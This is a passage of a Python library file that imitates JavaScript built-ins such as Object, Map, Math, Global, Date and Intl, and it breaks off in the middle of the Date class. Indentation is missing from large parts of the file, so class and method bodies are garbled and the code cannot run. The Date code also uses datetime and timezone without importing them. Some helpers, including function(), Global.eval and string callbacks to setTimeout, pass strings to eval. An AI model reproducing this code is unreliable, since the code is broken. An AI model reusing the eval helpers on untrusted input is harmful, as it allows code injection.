import math
import multiprocessing
import os
import random
import re
import signal
import struct
import sys
import threading
import time
import calendar
import urllib.parse
from multiprocessing.pool import ThreadPool as Pool
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
from urllib.parse import quote, unquote
import requests
from dateutil.parser import parse, parserinfo
from domonic.webapi.url import URL, URLSearchParams
from domonic.webapi.webstorage import Storage
def function(python_str: str) -> Callable:
    """[evals a string i.e.
    sup = function('''print("hi")''')
    sup()
    ]
    Args:
        python_str ([str]): [some valid python code as a string]
    """

    def anon():
        return eval(python_str)

    return anon
# TODO - list all javascript keywords to python keywords
true: bool = True
false: bool = False
null: object = None
undefined: object = None
# globalThis # TODO - do i need to use inpect? or is globals() ok?
# def typeof(v):
# return type(v).__name__
class Boolean:
"""[Creates a Boolean Object.
Warning this is NOT a boolean type. for that use Global.Boolean()]
"""
def __init__(self, value=False) -> None:
self.value: bool = Global.Boolean(value)
class Object:
def __init__(self, obj=None, *args, **kwargs) -> None:
"""[Creates a Javascript-like Object in python]
Args:
obj ([type]): [pass an object, dict or callable to the contructor]
"""
# print('object created!')
if obj is None:
obj = {}
self.prototype = self.__class__
self.__extensible = True
self.__frozen = False
self.__sealed = False
for arg in args:
self.__dict__.update(arg)
self.__dict__.update(kwargs)
# self.__dict__ = {}
        if callable(obj):
            self.__dict__.update(obj())
        elif isinstance(obj, dict):
            self.__dict__.update(obj)
        else:
            try:
                self.__dict__.update(obj.__dict__)
                self.__dict__.update(kwargs)
                # self.__dict__['__class__'] = obj.__class__.__name__
                # self.__dict__['__module__'] = obj.__module__
                # self.__dict__['__doc__'] = obj.__doc__
                # self.__dict__['__proto__'] = obj
                # self.__dict__['__proto__'].__class__ = Object
                # self.__dict__['__proto__'].__dict__ = self.__dict__
            except Exception as e:
                print("Object.__init__() failed to set attribs", e)
    def __str__(self):
        """Returns a string representation of the object"""
        d = self.__dict__.copy()
        for k in list(d.keys()):
            if "__" in k or "prototype" in k:
                del d[k]
        return str(d)
# def __repr__(self):
# """ Returns a string representation of the object."""
# return self.toString()
@staticmethod
def fromEntries(entries):
"""
transforms a list of lists containing key and value into an object.
@param entries: a list containing key and value tuples. The key and value are separated by ':'
@type entries: list of tuple(string, string)
@returns: a dict object.
>>> fromEntries(entries)
{'a': 1, 'b': 2, 'c': 3}
"""
return {k: v for k, v in entries}
@staticmethod
def assign(target, source):
"""Copies the values of all enumerable own properties from one or more source objects to a target object."""
if isinstance(target, dict):
if isinstance(source, dict):
for k, v in source.items():
target[k] = v
else:
for k, v in source.__dict__.items():
target[k] = v
else:
if isinstance(source, dict):
for k, v in source.items():
setattr(target, k, v)
else:
for k, v in source.attribs.items():
setattr(target, k, v)
# return target
# for prop in source.__dict__:
# if source.propertyIsEnumerable(prop):
# target.__dict__[prop] = source.__dict__[prop]
return target
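    # Usage sketch (illustrative): assign() mutates and returns the target,
    # whether it is a plain dict or an attribute-bearing object:
    #
    #   target = {"a": 1}
    #   Object.assign(target, {"b": 2})   # -> {"a": 1, "b": 2}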
@staticmethod
def create(proto, propertiesObject=None):
"""Creates a new object with the specified prototype object and properties."""
if propertiesObject is None:
return Object(proto)
if isinstance(propertiesObject, dict):
return Object(propertiesObject)
elif isinstance(propertiesObject, Object):
return propertiesObject
elif isinstance(propertiesObject, list):
return Object.fromEntries(propertiesObject)
else:
return propertiesObject
# return Object(propertiesObject)
# obj = {}
# for key in proto.keys():
# obj[key] = propertiesObject[key]
# return obj
@staticmethod
def defineProperty(obj, prop, descriptor):
"""Adds the named property described by a given descriptor to an object."""
obj[prop] = descriptor
# @staticmethod
# def defineProperties(obj, props):
# """ Adds the named properties described by the given descriptors to an object. """
# for prop, desc in props.items():
# obj.__define_property__(prop, desc) # TODO - obviously that wont work
    @staticmethod
    def entries(obj):
        """Returns an array containing all of the [key, value] pairs in the object."""
        if isinstance(obj, dict):
            return [[k, v] for k, v in obj.items()]
        if isinstance(obj, (float, int)):
            return []
        return [[k, v] for k, v in obj.__dict__.items()]
@staticmethod
def keys(obj):
"""Returns an array containing the names of all of the given object's own enumerable string properties."""
if isinstance(obj, dict):
return obj.keys()
if isinstance(obj, (float, int)):
return []
return obj.__dict__.keys() # TODO - this is probably wrong
@staticmethod
def values(obj):
"""Returns an array containing the values that correspond to
all of a given object's own enumerable string properties."""
if isinstance(obj, dict):
return obj.values()
if isinstance(obj, (float, int)):
return []
return obj.__dict__.values() # TODO - this is probably wrong
@staticmethod
def getOwnPropertyDescriptor(obj, prop):
"""Returns a property descriptor for a named property on an object."""
if isinstance(obj, dict):
return obj[prop]
return obj.__dict__[prop]
@staticmethod
def getOwnPropertyNames(obj):
"""Returns an array containing the names of all of the given object's
own enumerable and non-enumerable properties."""
if isinstance(obj, dict):
return obj.keys()
elif isinstance(obj, Object):
return obj.__dict__.keys()
elif isinstance(obj, object):
return [prop for prop in dir(obj) if not prop.startswith("__")]
return obj.__dict__.keys()
# @staticmethod
# def _is(value1, value2):
# """ Compares if two values are the same value.
# Equates all NaN values (which differs from both Abstract Equality Comparison
# and Strict Equality Comparison)."""
# pass
@staticmethod
def getOwnPropertySymbols(obj):
"""Returns an array of all symbol properties found directly upon a given object."""
if isinstance(obj, dict):
return []
return [prop for prop in dir(obj) if not prop.startswith("__")]
@staticmethod
def getPrototypeOf(obj):
"""Returns the prototype (internal [[Prototype]] property) of the specified object."""
if isinstance(obj, dict):
return obj
elif isinstance(obj, Object):
return obj.prototype
elif isinstance(obj, object):
return obj.__class__
return obj.__proto__
# @property #TODO - static or prop?
# def isExtensible(obj):
# """ Determines if extending of an object is allowed """
# return obj.__extensible
# @property #TODO - static or prop?
# def isSealed(obj):
# """ Determines if an object is sealed """
# return obj.__sealed
# @property
# def preventExtensions(obj):
# """ Prevents any extensions of an object. """
# if isinstance(obj, dict):
# return False
# elif isinstance(obj, Object):
# obj.extensible = False
# return True
# elif isinstance(obj, object):
# return False
# return False
# @property
# def seal(obj):
# """ Prevents other code from deleting properties of an object. """
# if isinstance(obj, dict):
# return False
# elif isinstance(obj, Object):
# obj.sealed = True
# return True
# elif isinstance(obj, object):
# return False
# return False
# @property
# def setPrototypeOf(obj, prototype):
# """ Sets the object's prototype (its internal [[Prototype]] property). """
# if isinstance(obj, dict):
# return False
# elif isinstance(obj, Object):
# obj.prototype = prototype
# return True
# elif isinstance(obj, object):
# return False
# return False
    @property
    def isFrozen(self):
        """Determines if an object was frozen."""
        return self.__frozen

    @staticmethod
    def freeze(obj):
        """Freezes an object. Other code cannot delete or change its properties."""
        obj.__frozen = True
# def prototype(self, obj):
# """
# prototype and allows you to add properties and methods to this object
# """
# if isinstance(obj, dict):
# return False
# elif isinstance(obj, Object):
# obj.prototype = self
# return True
# elif isinstance(obj, object):
# return False
# return False
def __defineGetter__(self, prop, func):
"""Adds a getter function for the specified property."""
self.__dict__[prop] = property(func)
return self
def __defineSetter__(self, prop, func):
"""Associates a function with a property that, when set, calls the function."""
self.__dict__[prop] = property(func)
return self
def __lookupGetter__(self, prop):
"""
Returns the getter function for the specified property.
"""
return self.__dict__[prop]
def __lookupSetter__(self, prop):
"""Returns the function associated with the specified property by the __defineSetter__() method."""
return self.__dict__[prop]
    def hasOwnProperty(self, prop):
        """Returns a boolean indicating whether an object contains the specified property
        as a direct property of that object and not inherited through the prototype chain."""
        return prop in self.__dict__
def isPrototypeOf(self, obj):
"""Returns a boolean indicating whether an object is a copy of this object."""
if isinstance(obj, Object):
return obj.prototype == self
elif isinstance(obj, dict):
return obj == self
elif isinstance(obj, object):
return obj.__class__ == self.__class__ and obj.__dict__ == self.__dict__
return obj.__class__ == self.__class__ and obj.__proto__ == self
# def propertyIsEnumerable(self, prop):
# """ Returns a boolean indicating whether the specified property is enumerable. """
# pass
def toLocaleString(self):
"""Calls toString()"""
return self.toString()
def toString(self):
"""Returns a string representation of the object."""
return "[" + self.__class__.__name__ + ": " + str(self.__dict__) + "]"
def valueOf(self):
"""Returns the value of the object."""
return self
    def __iter__(self):
        """Iterates over the object's properties."""
        yield from self.__dict__
def __hash__(self):
"""Returns the hash of the object."""
return hash(self.toString())
def __eq__(self, other):
"""Compares two objects."""
if isinstance(other, Object):
return self.toString() == other.toString()
return False
def __ne__(self, other):
"""Compares two objects."""
if isinstance(other, Object):
return self.toString() != other.toString()
return True
def __nonzero__(self):
"""Returns whether the object is false."""
return self.toString() != ""
def __bool__(self):
"""Returns whether the object is false."""
return self.toString() != ""
# def __dict__(self):
# """ Returns the object's attributes as a dictionary. """
# return self.__dict__
def __getitem__(self, key):
"""Returns the value of the specified property."""
# return self.__dict__[key]
# return self.__dict__.get(key, None)
return self.__dict__.get(key)
def __deepcopy__(self, memo):
"""Makes a deep copy of the object."""
return self.__class__(self.__dict__)
def __setitem__(self, key, value):
"""Sets the value of the specified property."""
# self.__dict__[key] = value
return self.__dict__.__setitem__(key, value)
def __delitem__(self, key):
"""Deletes the specified property."""
del self.__dict__[key]
def __len__(self):
"""Returns the number of properties."""
return len(self.__dict__)
def __contains__(self, key):
"""[Returns whether the specified property exists.]
Args:
key ([str]): [The name of the property to check for.]
Returns:
[bool]: [True if the specified property exists. Otherwise, False.]
"""
return key in self.__dict__
def __getattr__(self, name):
"""[gets the value of the specified property]
Args:
name ([str]): [the name of the property]
Returns:
[str]: [the value of the specified property]
"""
return self.__getitem__(name)
def __setattr__(self, name, val):
"""[sets the value of the specified property]
Args:
name ([str]): [the name of the property]
val ([str]): [the value of the property]
Returns:
[str]: [the value of the property]
"""
return self.__setitem__(name, val)
def __delattr__(self, name):
"""[deletes the specified property]
Args:
name ([str]): [the name of the property]
Returns:
[type]: [the value of the property]
"""
return self.__delitem__(name)
# def __call__(self, *args, **kwargs):
# """ Calls the object. """
# return self.toString()
class Function(Object):
"""a Function object"""
def __init__(self, func, *args, **kwargs):
self.func = func
self.arguments = args
self.caller = None
self.displayName = None
self.length = None
self.name = None
# self.isCallable = True
# self.constructor = False
# self.__proto__ = None
    def apply(self, thisArg=None, args=None, **kwargs):
        """[calls a function with a given this value, and arguments provided as an array]
        Args:
            thisArg ([type]): [The value of this provided for the call to func.]
            args ([list]): [an array-like of arguments, spread into the call as JS apply does]
        Returns:
            [type]: [result of calling the function.]
        """
        if args is None:
            args = []
        try:
            return self.func(*args)
        except TypeError:
            return self.func()
def bind(self, thisArg, *args, **kwargs):
"""[creates a new function that, when called,
has its this keyword set to the provided value,
with a given sequence of arguments preceding any provided when the new function is called.]
Args:
thisArg ([type]): [The value to be passed as the this parameter to the target
function func when the bound function is called.]
Returns:
[type]: [A copy of the given function with the specified this value, and initial arguments (if provided).]
"""
        from functools import partial

        # NOTE: thisArg is ignored; python functions have no `this` binding
        bound_f = partial(self.func, *args, **kwargs)
        return bound_f
# raise NotImplementedError
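    # Usage sketch (illustrative): bind() returns a partially-applied callable,
    # much like JS Function.prototype.bind (minus any real `this` binding):
    #
    #   add = Function(lambda a, b: a + b)
    #   add_two = add.bind(None, 2)
    #   add_two(3)   # -> 5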
# @staticmethod
def call(self, thisArg=None, *args, **kwargs):
"""[calls a function with a given this value and arguments provided individually.]
Args:
thisArg ([type]): [description]
Returns:
[type]: [result of calling the function.]
"""
if thisArg is not None:
try:
return self.func(thisArg) # kwargs?
except TypeError as e:
print(e)
return self.func()
try:
return self.func(*args)
except TypeError:
return self.func()
def toString(self):
"""[Returns a string representing the source code of the function. Overrides the]"""
raise NotImplementedError
class Map:
"""Map holds key-value pairs and remembers the original insertion order of the keys."""
    def __init__(self, collection=None):
        """[Pass a list or collection to make a Map object]
        Args:
            collection ([type]): [a list or dict]
        """
        # parses the passed collection
        if collection is None:
            collection = {}
        if isinstance(collection, list):
            # create a dict from the list
            collection = dict(zip(collection, collection))
        elif not isinstance(collection, dict):
            raise TypeError("Map requires a list or dict.")
        self._data: dict = dict(collection)
        self._order: list = list(self._data.keys())
    def __contains__(self, key: str):
        return key in self._data

    def __getitem__(self, key: str):
        return self._data[key]

    def __setitem__(self, key: str, value):
        if key not in self._data:
            self._order.append(key)
        self._data[key] = value

    def __delitem__(self, key: str):
        self._order.remove(key)
        del self._data[key]
def clear(self):
"""Removes all key-value pairs from the Map object."""
self._data = {}
self._order = []
    def delete(self, key: str) -> bool:
        """Returns true if an element in the Map object existed and has been removed,
        or false if the element does not exist. Map.prototype.has(key) will return false afterwards."""
        try:
            self._order.remove(key)
            del self._data[key]
            return True
        except (KeyError, ValueError):
            return False

    def get(self, key: str, default=None):
        """Returns the value associated to the key, or undefined if there is none."""
        return self._data.get(key, default)

    def has(self, key: str) -> bool:
        """Returns a boolean asserting whether a value has been associated to the key in the Map object or not."""
        return key in self._data

    def set(self, key: str, value):
        """Sets the value for the key in the Map object. Returns the Map object."""
        if key not in self._data:
            self._order.append(key)
        self._data[key] = value
        return self

    def iterkeys(self):
        return iter(self._order)

    def iteritems(self):
        for key in self._order:
            yield key, self._data[key]

    def keys(self):
        """Returns a new Iterator object that contains the keys
        for each element in the Map object in insertion order."""
        return list(self.iterkeys())

    def values(self):
        """Returns a new Iterator object that contains the values
        for each element in the Map object in insertion order."""
        return [self._data[key] for key in self._order]

    def entries(self):
        """Returns a new Iterator object that contains an array of [key, value]
        for each element in the Map object in insertion order."""
        return [(x, self._data[x]) for x in self._order]
# def forEach(self, callbackFn[, thisArg]):
# raise NotImplementedError
# TODO - is this supposed to pass count like Node list? i.e.
# for i in range(len(self.args)):
# func(self.args[i], i, self.args)
    def update(self, ordered_dict):
        for key, value in ordered_dict.items():
            self[key] = value

    def __str__(self):
        return str([(x, self._data[x]) for x in self._order])
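# Usage sketch (illustrative): Map keeps insertion order and set() chains:
#
#   m = Map({})
#   m.set("b", 2).set("a", 1)
#   m.keys()       # -> ['b', 'a']  (insertion order, not sorted)
#   m.get("a")     # -> 1
#   m.delete("b")  # -> True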
# TODO - moved to webapi.xhr . might import here for convenience?
# class FormData:
# """[utils for a form]
# Args:
# object ([str]): [takes a string or pyml object and returns a FormData]
# """
# def __init__(self, form):
# """ creates a new FormData object. """
# # TODO - parse to domonic.
# # if isinstance(form, str):
# # self._data = domonic.loads(form) # TODO - parser wont be done enough yet
# # if isinstance(form, Node):
# # self._data = form
# raise NotImplementedError
# def append(self, name, value, filename):
# """ Appends a new value onto an existing key inside a FormData object,
# or adds the key if it does not already exist. """
# raise NotImplementedError
# def delete(self, name):
# """ Deletes a key/value pair from a FormData object. """
# raise NotImplementedError
# def entries(self):
# """ Returns an iterator allowing to go through all key/value pairs contained in this object. """
# raise NotImplementedError
# def get(self, name):
# """ Returns the first value associated with a given key from within a FormData object. """
# raise NotImplementedError
# def getAll(self, name):
# """ Returns an array of all the values associated with a given key from within a FormData """
# raise NotImplementedError
# def has(self, name):
# """ Returns a boolean stating whether a FormData object contains a certain key."""
# raise NotImplementedError
# def keys(self):
# """ Returns an iterator allowing to go through all keys of the key/value pairs contained in this object."""
# raise NotImplementedError
# def set(self, name, value, filename):
# """ Sets a new value for an existing key inside a FormData object,
# or adds the key/value if it does not already exist."""
# raise NotImplementedError
# def values(self):
# """ Returns an iterator allowing to go through all values contained in this object."""
# raise NotImplementedError
class Worker:
"""[A background task that can be created via script, which can send messages back to its creator.
Creating a worker is done by calling the Worker("path/to/worker/script") constructor.]
TODO - JSWorker - Node
Args:
object ([str]): [takes a path to a python script]
"""
def __init__(self, script):
"""creates a new Worker object."""
raise NotImplementedError
    def postMessage(self):
        """Sends a message, consisting of any object, to the worker's inner scope."""
        raise NotImplementedError
def terminate(self):
"""Immediately terminates the worker. This does not let worker finish its operations; it is halted at once.
ServiceWorker instances do not support this method."""
raise NotImplementedError
class Math(Object):
"""Math class that mirrors javascript implementation.
i.e. you can pass strings and it will also work, Math.abs('-1')
"""
PI: float = 3.141592653589793
E: float = 2.718281828459045
LN2: float = 0.6931471805599453
LN10: float = 2.302585092994046
LOG2E: float = 1.4426950408889634
LOG10E: float = 0.4342944819032518
SQRT1_2: float = 0.7071067811865476
SQRT2: float = 1.4142135623730951
def _force_number(func):
"""[private decorator to make Math behave like javascript and turn strings, bools and None into numbers]]"""
def validation_decorator(*args, **kwargs):
params = list(args)
for i, n in enumerate(params):
if type(n) == list or type(n) == tuple:
if len(n) == 0:
params[i] = n = 0
elif len(n) == 1:
params[i] = n = n[0]
if type(n) == str:
if n == "":
params[i] = n = 0
continue
if n is None:
params[i] = 0
continue
if type(n) != float and type(n) != int:
try:
if "." in n:
params[i] = float(n)
else:
params[i] = int(n)
except Exception:
# raise ValueError("")
# js returns None instead
pass
args = tuple(params)
try:
return func(*args)
except Exception:
return None
return validation_decorator
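    # Illustrative coercion performed by @_force_number, mirroring JS:
    #
    #   Math.abs("-1")    # -> 1  (numeric strings are converted)
    #   Math.floor(None)  # -> 0  (None is treated as 0)
    #   Math.ceil("")     # -> 0  (the empty string is treated as 0)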
@staticmethod
@_force_number
def abs(x: float) -> float:
"""[Returns the absolute value of a number.]
Args:
x ([float]): [number]
Returns:
[float]: [absolute value]
"""
return abs(x)
@staticmethod
@_force_number
def acos(x: float) -> float:
"""[Returns the arccosine (in radians) of a number.]
Args:
x ([float]): [number]
Returns:
[float]: [arccosine]
"""
return math.acos(x)
@staticmethod
@_force_number
def acosh(x: float) -> float:
"""Returns the hyperbolic arccosine of a number."""
return math.acosh(x)
@staticmethod
@_force_number
def asin(x: float) -> float:
"""Returns the arcsine (in radians) of a number."""
return math.asin(x)
@staticmethod
@_force_number
def asinh(x: float) -> float:
"""Returns the hyperbolic arcsine of a number."""
return math.asinh(x)
@staticmethod
@_force_number
def atan(x: float) -> float:
"""Returns the arctangent (in radians) of a number."""
return math.atan(x)
@staticmethod
@_force_number
def atan2(x: float, y: float) -> float:
"""Returns the arctangent of the quotient of its arguments."""
return math.atan2(x, y)
@staticmethod
@_force_number
def atanh(x: float) -> float:
"""Returns the hyperbolic arctangent of a number."""
return math.atanh(x)
@staticmethod
@_force_number
def cbrt(x: float) -> float:
"""Returns the cube root of a number."""
return math.cbrt(x)
@staticmethod
@_force_number
def ceil(x: float) -> float:
"""Returns the smallest integer greater than or equal to a number."""
return math.ceil(x)
@staticmethod
@_force_number
def cos(x: float) -> float:
"""Returns the cosine of a number. (x is in radians)"""
return math.cos(x)
@staticmethod
@_force_number
def cosh(x: float) -> float:
"""Returns the hyperbolic cosine of a number."""
return math.cosh(x)
@staticmethod
@_force_number
def exp(x: float) -> float:
"""Returns the value of E^x."""
return math.exp(x)
@staticmethod
@_force_number
def floor(x: float) -> float:
"""Returns the largest integer less than or equal to a number."""
return math.floor(x)
@staticmethod
@_force_number
def log(x: float, base: float = None) -> float:
"""Returns the natural logarithm (base E) of a number."""
if base is None:
return math.log(x)
else:
return math.log(x, base)
@staticmethod
@_force_number
def max(x: float, y: float) -> float:
"""Returns the largest of two numbers."""
return max(x, y)
@staticmethod
@_force_number
def min(x: float, y: float) -> float:
"""Returns the smallest of two numbers."""
return min(x, y)
@staticmethod
@_force_number
def random() -> float:
"""Returns a random number between 0 and 1."""
return random.random()
@staticmethod
@_force_number
def round(x: float) -> float:
"""Returns the value of a number rounded to its nearest integer."""
return round(x)
@staticmethod
@_force_number
def pow(x: float, y: float) -> float:
"""Returns the value of a number raised to a power."""
return math.pow(x, y)
@staticmethod
@_force_number
def sin(x: float) -> float:
"""Returns the sine of a number. (x is in radians)"""
return math.sin(x)
@staticmethod
@_force_number
def sinh(x: float) -> float:
"""Returns the hyperbolic sine of a number."""
return math.sinh(x)
@staticmethod
@_force_number
def sqrt(x: float) -> float:
"""Returns the square root of a number."""
return math.sqrt(x)
@staticmethod
@_force_number
def tan(x: float) -> float:
"""Returns the tangent of a number. (x is in radians)"""
return math.tan(x)
@staticmethod
@_force_number
def tanh(x: float) -> float:
"""Returns the hyperbolic tangent of a number."""
return math.tanh(x)
@staticmethod
@_force_number
def trunc(x: float) -> float:
"""Returns the integer part of a number."""
return math.trunc(x)
# TODO - test
@staticmethod
# @_force_number
def hypot(*args):
"""returns the square root of the sum of squares of its arguments"""
return math.hypot(*args)
# TODO - test
@staticmethod
# @_force_number
    def log2(*args):
        """returns the base-2 logarithm of a number"""
        return math.log2(*args)

    # TODO - test
    @staticmethod
    # @_force_number
    def log1p(*args):
        """returns the natural logarithm (base e) of 1 plus the given number"""
        return math.log1p(*args)
# TODO - test
@staticmethod
@_force_number
    def log10(x):
        """returns the base 10 logarithm of a number"""
        return math.log10(x)
# TODO - test
@staticmethod
@_force_number
    def fround(x):
        """returns the nearest 32-bit single precision float representation of a Number"""
        # round-trip through a C float to discard the extra double precision
        return struct.unpack("f", struct.pack("f", x))[0]

    # TODO - test
    @staticmethod
    @_force_number
    def clz32(x):
        """returns the number of leading zero bits in the 32-bit binary representation of a number."""
        # clamp to an unsigned 32-bit integer, then count the unused high-order bits
        return 32 - (int(x) & 0xFFFFFFFF).bit_length()
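    # Illustrative results for the bit-level helpers above:
    #
    #   Math.fround(5.5)   # -> 5.5 (exactly representable as a 32-bit float)
    #   Math.fround(5.05)  # -> 5.050000190734863
    #   Math.clz32(1)      # -> 31
    #   Math.clz32(1000)   # -> 22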
# import urllib
class Global:
"""javascript global methods"""
NaN = "NaN"
Infinity = float("inf")
__timers = {}
# TODO - https://stackoverflow.com/questions/747641/what-is-the-difference-between-decodeuricomponent-and-decodeuri
@staticmethod
def decodeURI(x):
"""Decodes a URI"""
return unquote(x)
@staticmethod
def decodeURIComponent(x):
"""Decodes a URI component"""
return unquote(x, encoding="utf-8")
@staticmethod
def encodeURI(x):
"""Encodes a URI"""
return quote(str(x), safe="~@#$&()*!+=:;,.?/'")
@staticmethod
def encodeURIComponent(x):
"""Encodes a URI component"""
return quote(str(x), safe="~()*!.'")
# @staticmethod
# def escape():
""" Deprecated in version 1.5. Use encodeURI() or encodeURIComponent() """
# pass
@staticmethod
def eval(pythonstring):
"""Evaluates a string and executes it as if it was script code"""
        return eval(pythonstring)
@staticmethod
def isFinite(x) -> bool: # TODO - test
"""Returns true if x is a finite number"""
return math.isfinite(x)
@staticmethod
def isNaN(x):
"""Determines whether a value is an illegal number"""
try:
return math.isnan(x)
except TypeError:
return True
@staticmethod
def Number(x):
"""Converts an object's value to a number"""
try:
if type(x) == float or type(x) == int: # or type(x) == long:
return x
if type(x) == str:
if "." in x:
return float(x)
else:
return int(x)
except Exception:
return "NaN"
return "NaN"
@staticmethod
    def Boolean(x):  # TODO - test
        if x is None:
            return False
        if isinstance(x, bool):
            return x
        if isinstance(x, int):
            return bool(x)
        if isinstance(x, str):
            if x.lower() == "true":
                return True
            if x.lower() == "false":
                return False
            return x != ""
        # lists, tuples, dicts and other objects are always truthy in JS
        return True
@staticmethod
def parseFloat(x: str):
"""Parses a string and returns a floating point number"""
# return float(x)
import ast
return float(ast.literal_eval(x))
@staticmethod
def parseInt(x: str):
"""Parses a string and returns an integer"""
# return int(x)
import ast
return int(ast.literal_eval(x))
@staticmethod
def String(x):
"""Converts an object's value to a string"""
return str(x)
def undefined(self):
"""Indicates that a variable has not been assigned a value"""
return None
# @staticmethod
# def unescape():
""" Deprecated in version 1.5. Use decodeURI() or decodeURIComponent() instead """
# pass
@staticmethod
def require(path: str):
"""Loads a script from a file"""
# '.'.join(path.split('/'))
# module = __import__(path) # app.components.{component}
# my_class = getattr(module, component.title())
# return my_class()
raise NotImplementedError
@staticmethod
def setTimeout(callback, t, *args, **kwargs):
"""[sets a timer which executes a function or evaluates an expression after a specified delay]
Args:
callback (function): [method to be executed after the delay]
t ([int]): [milliseconds]
Returns:
[str]: [an identifier for the timer]
"""
if isinstance(callback, str):
callback = eval(callback)
timer = threading.Timer(t / 1000, callback, args=args, kwargs=kwargs)
timer_id = id(timer)
Global.__timers[timer_id] = timer
timer.start()
return timer_id
@staticmethod
def clearTimeout(timeoutID):
"""[cancels a timer set with setTimeout()]
Args:
timeoutID ([str]): [the identifier returned by setTimeout()]
"""
Global.__timers.pop(timeoutID).cancel()
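    # Usage sketch (illustrative): schedule a callback in 500ms, then cancel it
    # before it fires:
    #
    #   tid = Global.setTimeout(lambda: print("tick"), 500)
    #   Global.clearTimeout(tid)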
# NOTE - for globals use the class to make them but then register them here
decodeURI = Global.decodeURI
decodeURIComponent = Global.decodeURIComponent
encodeURI = Global.encodeURI
encodeURIComponent = Global.encodeURIComponent
parseFloat = Global.parseFloat
parseInt = Global.parseInt
setTimeout = Global.setTimeout
clearTimeout = Global.clearTimeout
class Performance:
_start = time.time()
def __init__(self):
pass
    def now(self):
        # JS performance.now() reports milliseconds since the time origin
        end = time.time()
        return (end - Performance._start) * 1000
# def reset(self):
# Performance._start = time.time()
performance = Performance()
class Intl:
def __init__(self):
pass
@staticmethod
    def getCanonicalLocales(locales):
        """Returns the canonicalized locales."""
        if isinstance(locales, str):
            locales = [locales]
        canonical = []
        for locale in locales:
            if locale.find("-") != -1:
                parts = locale.split("-")
                locale = parts[0].lower() + "-" + parts[1].upper()
            elif locale.find("_") != -1:
                parts = locale.split("_")
                locale = parts[0].lower() + "_" + parts[1].upper()
            else:
                locale = locale.lower()
            canonical.append(locale)
        return canonical
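    # Illustrative canonicalization:
    #
    #   Intl.getCanonicalLocales("en-us")           # -> ['en-US']
    #   Intl.getCanonicalLocales(["en-us", "fr"])   # -> ['en-US', 'fr']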
@staticmethod
def supportedValuesOf(locales, property):
"""Returns a sorted array containing the supported unique calendar,
collation, currency, numbering systems, or unit values supported by the implementation."""
pass
class _Collator:
def __init__(self, locale):
self.locale = locale
print("Intl._Collator.__init__", locale)
Collator = _Collator
class _DateTimeFormat:
@staticmethod
def supportedLocalesOf():
raise NotImplementedError
DateTimeFormat = _DateTimeFormat
class _NumberFormat:
def __init__(self, locales, options):
pass
NumberFormat = _NumberFormat
class Date(Object):
"""javascript date"""
@staticmethod
def parse(date_string):
"""Parses a date string and returns the number of milliseconds since January 1, 1970"""
d = Date()
d.parse_date(str(date_string))
return int(d.date.timestamp() * 1000)
def __init__(self, date=None, *args, formatter="python", **kwargs):
"""A date object that tries to behave like the Javascript one.
TODO - js allowed dates are larger than pythons(mysql) datetime 99999 limit
TODO - also negative dates i.e. BC don't seem to be allowed with datetime
Args:
date (_type_, optional): _description_. Defaults to None.
formatter (str, optional): _description_. Defaults to 'python'.
"""
# join all the args on the date string
if len(args) > 0:
# parses dates passed in like: Date(1994, 12, 10)
if date is None:
date = ""
else:
date = str(date)
for arg in args:
date += " " + str(arg)
# print("date is:::::::::::::::::::::::::::::::::::::", date)
date = date.strip()
if date == "":
date = None
self.formatter = formatter
if isinstance(date, int):
self.date = datetime.datetime.fromtimestamp(date)
return
# elif isinstance(date, str):
# if formatter == 'python':
# self.date = datetime.datetime.strptime(date, '%Y-%m-%d %H:%M:%S')
# elif formatter == 'javascript':
# self.date = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%fZ')
# else:
# raise ValueError('Invalid formatter')
if date is None:
self.date = datetime.datetime.now()
else:
self.date = self.parse_date(date)
def __str__(self):
return self.toString()
def toString(self):
"""Returns a string representation of the date"""
if self.formatter == "python":
return self.date.strftime("%Y-%m-%d %H:%M:%S")
else:
return self.date.strftime("%Y-%m-%dT%H:%M:%S.%fZ") # js
def parse_date(self, date_string):
class MyParserInfo(parserinfo):
def convertyear(self, year, *args, **kwargs):
# browser ticks over at approx 30 years (1950 when I check in chrome)
if year < 100 and year > 30:
year += 1900
return year
self.date = parse(date_string, MyParserInfo())
return self.date
def getDate(self):
"""Returns the day of the month (from 1-31)"""
return self.date.day
    def getDay(self):
        """Returns the day of the week (from 0-6 : Sunday-Saturday)
        Returns:
            int: An integer number, between 0 and 6, corresponding to the day of the week for the given date,
            according to local time: 0 for Sunday, 1 for Monday, 2 for Tuesday, and so on
        """
        # isoweekday(): Monday=1 .. Sunday=7; JS wants Sunday=0 .. Saturday=6
        return self.date.isoweekday() % 7
def getFullYear(self):
"""Returns the year"""
return self.date.year
def getHours(self):
"""Returns the hour (from 0-23)"""
return self.date.hour
def getMilliseconds(self):
"""Returns the milliseconds (from 0-999)"""
return round(self.date.microsecond / 1000)
def getMinutes(self):
"""Returns the minutes (from 0-59)"""
return self.date.minute
def getMonth(self):
"""Returns the month (from 0-11)"""
return self.date.month - 1
def getSeconds(self):
"""Returns the seconds (from 0-59)"""
return self.date.second
def getTime(self):
"""Returns A number representing the milliseconds elapsed between 1 January 1970 00:00:00 UTC and self.date"""
epoch = datetime.datetime(1970, 1, 1)
self.date = self.date.replace(tzinfo=timezone.utc)
epoch = epoch.replace(tzinfo=timezone.utc)
return int((self.date - epoch).total_seconds() * 1000)
def getTimezoneOffset(self):
"""Returns the difference, in minutes, between a date as evaluated in the UTC time zone,
and the same date as evaluated in the local time zone"""
# return self.date.now().utcoffset().total_seconds() / 60 # TODO - TEST
# date1 = self.date.astimezone()
# date1.replace(tzinfo = timezone.utc)
# date2 = self.date.astimezone()
# date2.replace(tzinfo=timezone.utc)
raise NotImplementedError()
    def _utc(self):
        """internal helper: this date as evaluated in the UTC time zone"""
        return self.date.astimezone(timezone.utc)

    def getUTCDate(self):
        """Returns the day of the month, according to universal time (from 1-31)"""
        return self._utc().day

    def getUTCDay(self):
        """Returns the day of the week, according to universal time (from 0-6)"""
        return self._utc().isoweekday() % 7

    def getUTCFullYear(self):
        """Returns the year, according to universal time"""
        return self._utc().year

    def getUTCHours(self):
        """Returns the hour, according to universal time (from 0-23)"""
        return self._utc().hour

    def getUTCMilliseconds(self):
        """Returns the milliseconds, according to universal time (from 0-999)"""
        return round(self._utc().microsecond / 1000)

    def getUTCMinutes(self):
        """Returns the minutes, according to universal time (from 0-59)"""
        return self._utc().minute

    def getUTCMonth(self):
        """Returns the month, according to universal time (from 0-11)"""
        return self._utc().month - 1

    def getUTCSeconds(self):
        """Returns the seconds, according to universal time (from 0-59)"""
        return self._utc().second
def getYear(self):
